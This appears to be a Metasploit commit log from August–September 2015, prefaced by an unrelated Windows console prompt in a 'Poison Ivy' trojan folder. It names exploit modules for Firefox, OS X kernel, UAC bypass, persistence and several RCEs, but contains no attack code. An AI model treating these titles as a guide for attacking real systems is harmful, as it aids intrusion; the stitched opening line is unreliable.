(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
2015-09-07 17:48:28 +02:00
xistence
1d492e4b25
Lots of X11 protocol changes
2015-09-06 15:55:16 +07:00
Ewerson Guimaraes (Crash)
944f47b064
Update
...
Check nil
Removed headers
Fixed url normalization
2015-09-05 10:07:58 +02:00
JT
2f8dc7fdab
Update w3tw0rk_exec.rb
...
changed response to res
2015-09-05 14:21:07 +08:00
jvazquez-r7
23ab702ec4
Land #5631 , @blincoln682F048A's module for Endian Firewall Proxy
...
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7
2abfcd00b1
Use snake_case
2015-09-04 16:27:09 -05:00
jvazquez-r7
15aa5de991
Use Rex::MIME::Message
2015-09-04 16:26:53 -05:00
jvazquez-r7
adcd3c1e29
Use static max length
2015-09-04 16:18:55 -05:00
Ewerson Guimaraes (Crash)
68d27acd69
Update
...
Add exploit-db references
nil check to version
2015-09-04 23:18:24 +02:00
jvazquez-r7
1ebc25092f
Delete some comments
2015-09-04 16:18:15 -05:00
Ewerson Guimaraes (Crash)
5b5e97f37a
Update
...
Add normalize_uri
Change print_status tp vprint_status
Removed unused http headers
an other minor changes
2015-09-04 22:12:42 +02:00
Roberto Soares
cc405957db
Add some improvements
2015-09-04 16:02:30 -03:00
Roberto Soares
4531d17cab
Added the rest of the code
2015-09-04 15:37:42 -03:00
Roberto Soares
b9ba12e42a
Added get_token method.
2015-09-04 15:27:28 -03:00
Ewerson Guimaraes (Crash)
5063acac3c
Poorly designed argument fixed
...
Poorly designed argument fixed
2015-09-04 19:43:49 +02:00
HD Moore
04d622b69b
Cleanup Jenkins-CI module titles and option descriptions
2015-09-04 10:25:51 -07:00
Ewerson Guimaraes (Crash)
cf8b34191d
Updates
...
Add Def for cgi request.
2015-09-04 19:19:02 +02:00
Roberto Soares
6f4f8e34b4
Added method bolt_login.
2015-09-04 10:45:15 -03:00
wchen-r7
d55757350d
Use the latest credential API, no more report_auth_info
2015-09-04 03:04:14 -05:00
Roberto Soares
a195f5bb9e
Initial commit - Skeleton
2015-09-04 04:09:16 -03:00
jvazquez-r7
ef6df5bc26
Use get_target_arch
2015-09-03 16:30:46 -05:00
jvazquez-r7
2588439246
Add references for the win32k info leak
2015-09-03 15:35:41 -05:00
James Lee
b2c401696b
Add certutil support.
...
Tested while landing #5736
2015-09-03 14:24:37 -05:00
James Lee
1e6a1f6d05
Revert "Fix spec like I shoulda done before landing #5736"
...
This reverts commit 956c8e550d
.
Conflicts:
spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
2015-09-03 14:18:55 -05:00
Ewerson Guimaraes (Crash)
92aa09a586
Merge remote-tracking branch 'rapid7/master' into Uptime
2015-09-03 20:48:50 +02:00
Ewerson Guimaraes (Crash)
6250983fb4
Update
...
Update
2015-09-03 20:29:57 +02:00
James Lee
b4547711f3
Add certutil support.
...
Tested while landing #5736
2015-09-03 13:27:10 -05:00
jvazquez-r7
697a6cd335
Rescue the process execute
2015-09-03 13:03:36 -05:00
jvazquez-r7
80a1e32339
Set Manual Ranking
2015-09-03 12:24:45 -05:00
HD Moore
9b51352c62
Land #5639 , adds registry persistence
2015-09-03 11:26:38 -05:00
jvazquez-r7
dbe901915e
Improve version detection
2015-09-03 09:54:38 -05:00
jvazquez-r7
de25a6c23c
Add metadata
2015-09-02 18:32:45 -05:00
jvazquez-r7
8f70ec8256
Fix Disclosure date
2015-09-02 18:21:36 -05:00
jvazquez-r7
b912e3ce65
Add exploit template
2015-09-02 17:28:35 -05:00
HD Moore
4090c2c8ea
Land #5880 , adds ScriptHost UAC bypass for Win7/2008
2015-09-02 14:14:18 -05:00
Meatballs
582cc795ac
Remove newlines
2015-09-02 19:42:04 +01:00
HD Moore
43d3e69fb2
Land #5917 , update local exploit checks
2015-09-02 12:55:45 -05:00
HD Moore
95b9208a63
Change recv to get_once to avoid indefinite hangs, cosmetic tweaks.
2015-09-02 10:30:19 -05:00
xistence
a81a9e0ef8
Added TIME_WAIT for GUI windows
2015-09-02 16:55:20 +07:00
Meatballs
8f25a006a8
Change to automatic target
2015-09-02 09:13:25 +01:00
wchen-r7
4275a65407
Update local exploit checks to follow the guidelines.
...
Please see wiki "How to write a check() method" to learn how
these checkcodes are determined.
2015-09-01 23:26:45 -05:00
Meatballs
27775fbe58
Restrict to 7 and 2k8
2015-09-01 22:23:37 +01:00
HD Moore
cd65478d29
Land #5826 , swap ExitFunction -> EXITFUNC
2015-09-01 13:58:12 -05:00
Christian Mehlmauer
bfc24aea16
change exitfunc to thread
2015-09-01 10:52:25 +02:00
Christian Mehlmauer
115f409fef
change exitfunc to thread
2015-09-01 10:48:07 +02:00
Christian Mehlmauer
5398bf78eb
change exitfunc to thread
2015-09-01 10:46:54 +02:00
Christian Mehlmauer
3e613dc333
change exitfunc to thread
2015-09-01 10:43:45 +02:00
Christian Mehlmauer
648c034d17
change exitfunc to thread
2015-09-01 10:42:15 +02:00
Ewerson Guimaraes (Crash)
252e80e793
Uptime Version 7.4.0 / 7.5.0 Upload and Exec file
...
Uptime Version 7.4.0 / 7.5.0 Upload and Exec file
2015-08-31 23:57:39 +02:00
Brent Cook
d670a62000
Land #5822 , migrate obsolete payload compatibility options
2015-08-31 15:20:20 -05:00
wchen-r7
9364982467
Land #5665 , Add osx rootpipe entitlements exploit for 10.10.3
2015-08-28 13:33:16 -05:00
wchen-r7
e45347e745
Explain why vulnerable
2015-08-28 13:26:01 -05:00
wchen-r7
423d52476d
Normal options should be all caps
2015-08-28 13:24:23 -05:00
Muhamad Fadzil Ramli
1b4f4fd225
remove url reference
2015-08-27 19:47:37 +08:00
jvazquez-r7
da4b360202
Fix typo
2015-08-26 15:29:34 -05:00
jvazquez-r7
5d0ed797a3
Update DLL
2015-08-26 15:15:32 -05:00
jvazquez-r7
dd529013f6
Update ruby side
2015-08-26 15:12:09 -05:00
JT
ff868f9704
Update w3tw0rk_exec.rb
2015-08-26 23:51:09 +08:00
JT
3f6c04a445
Update w3tw0rk_exec.rb
2015-08-26 23:48:31 +08:00
JT
16341d34a2
Update w3tw0rk_exec.rb
2015-08-26 23:34:29 +08:00
JT
892f427664
Update w3tw0rk_exec.rb
...
removed w3tw0rk_login
2015-08-26 09:18:15 +08:00
JT
6edba2cdc8
Update w3tw0rk_exec.rb
2015-08-26 09:11:30 +08:00
JT
c77226c354
Update w3tw0rk_exec.rb
2015-08-26 01:28:07 +08:00
JT
25fb325410
w3tw0rk / Pitbul IRC Bot Remote Code Execution
2015-08-26 01:22:55 +08:00
Brent Cook
b1ef560264
Merge payload_inject 64-bit inject fix from @Meatballs1
2015-08-24 09:26:00 -05:00
Muhamad Fadzil Ramli
03b1ad7491
add reference info
2015-08-24 11:18:26 +08:00
Muhamad Fadzil Ramli
73cb1383d2
amend banner info for check
2015-08-24 10:55:43 +08:00
Meatballs
1c91b126f1
X64 compat for payload_inject
2015-08-23 22:03:57 +01:00
Meatballs
228087dced
Initial working scripthost bypass uac
2015-08-23 20:16:15 +01:00
Muhamad Fadzil Ramli
7587319602
run rubocop & msftidy
2015-08-23 23:32:30 +08:00
Muhamad Fadzil Ramli
a5daa5c9be
added module descriptions
2015-08-23 23:12:41 +08:00
Muhamad Fadzil Ramli
91a7531af8
konica minolta ftp server post auth cwd command exploit
2015-08-23 21:49:26 +08:00
wchen-r7
dc1e7e02b6
Land #5853 , Firefox 35-36 RCE one-click exploi
2015-08-20 13:27:21 -05:00
wchen-r7
45c7e4760a
Support x64 payloads
2015-08-20 02:09:58 -05:00
Brent Cook
6b94513a37
Land #5860 , add tpwn OS X local kernel exploit ( https://github.com/kpwn/tpwn )
2015-08-17 17:41:04 -05:00
William Vu
26165ea93f
Add tpwn module
2015-08-17 17:11:11 -05:00
Brent Cook
b17d8f8d49
Land #5768 , update modules to use metasploit-credential
2015-08-17 17:08:58 -05:00
joev
98e2d074c3
Add disclosure date.
2015-08-15 20:09:41 -05:00
joev
a133e98ba5
Adds a ff 35-36 RCE vector based off the recent ff bug.
2015-08-15 20:02:00 -05:00
HD Moore
42e08cbe07
Fix bad use of get_profile (now browser_profile)
2015-08-14 19:50:42 -05:00
jvazquez-r7
c02df6b39d
Land #5800 , @bperry's Symantec Endpoint Protection Manager RCE module
2015-08-14 17:03:48 -05:00
jvazquez-r7
b33abd72ce
Complete description
2015-08-14 17:03:21 -05:00
jvazquez-r7
4aa3be7ba2
Do ruby fixing and use FileDropper
2015-08-14 17:00:27 -05:00
Spencer McIntyre
33f1324fa9
Land #5813 , @jakxx adds VideoCharge SEH file exploit
2015-08-13 18:01:25 -04:00
jakxx
e9d3289c23
EXITFUNC caps
2015-08-13 17:25:31 -04:00
jakxx
6e1c714b2b
Update to leverage auto-NOP generation
2015-08-13 17:24:18 -04:00
jakxx
361624161b
msftidy
2015-08-13 16:27:27 -04:00
jakxx
03eb2d71b2
Add watermark fileformat exploit
2015-08-13 16:26:17 -04:00
William Vu
f19186adda
Land #5841 , homm3_h3m default target change
2015-08-13 14:54:58 -05:00
Tod Beardsley
02c6ea31bb
Use the more recent HD version as default target
2015-08-13 14:42:21 -05:00
Christian Mehlmauer
80a22412d9
use EXITFUNC instead of ExitFunction
2015-08-13 21:22:32 +02:00
William Vu
605a14350f
Land #5833 , sshexec improvements
2015-08-13 14:16:22 -05:00
William Vu
3bd6c4cee4
Add a comma
2015-08-13 14:16:09 -05:00
Mo Sadek
677ec341dd
Land #5839 , pre-bloggery cleanup edits
2015-08-13 13:43:57 -05:00
William Vu
c94a185610
Land #5697 , Werkzeug debug RCE
2015-08-13 13:32:27 -05:00
William Vu
d54ee19ce9
Clean up module
2015-08-13 13:32:22 -05:00
Tod Beardsley
bb4116ed9d
Avoid msftidy.rb rule breaking on missing newline
2015-08-13 12:38:05 -05:00
jakxx
e7566d6aee
Adding print_status line
2015-08-12 16:08:04 -04:00
Spencer McIntyre
28fbb7cdde
Update the description of the sshexec module
2015-08-12 16:05:09 -04:00
Spencer McIntyre
dfe2bbf1e9
Add a python target to the sshexec module
2015-08-12 15:46:47 -04:00
Christian Mehlmauer
979d7e6be3
improve module
2015-08-12 15:37:37 +02:00